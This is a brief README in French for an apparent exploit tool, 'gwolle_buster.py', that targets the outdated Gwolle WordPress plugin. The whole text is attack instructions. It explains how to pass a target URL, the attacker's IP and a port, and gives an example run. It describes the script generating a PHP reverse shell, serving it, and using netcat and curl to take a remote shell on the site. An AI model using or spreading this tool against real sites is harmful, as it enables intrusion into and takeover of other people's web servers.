
Ce script est un exploit pour l'ancien plugin WordPress gwolle
Ce script est un exploit pour l'ancien plugin WordPress gwolle
utilisation :
./gwolle_buster.py <target_url>
premier argument <target_url> => l'URL cible de votre WordPress qui a installé gwolle deuxième argument => votre IP troisième argument => port d'écoute pour le reverse shell
exemple : ./gwolle_buster.py http://vulnpress.com/ 192.168.1.5 1234
Ce script générera le script de reverse shell PHP et lancera un serveur simple, vous devez donc ouvrir deux nouveaux terminaux et écouter avec netcat dans le premier terminal, et envoyer des requêtes avec curl, cependant, les commandes sont générées automatiquement et apparaissent dans la console, vous pouvez donc les copier-coller facilement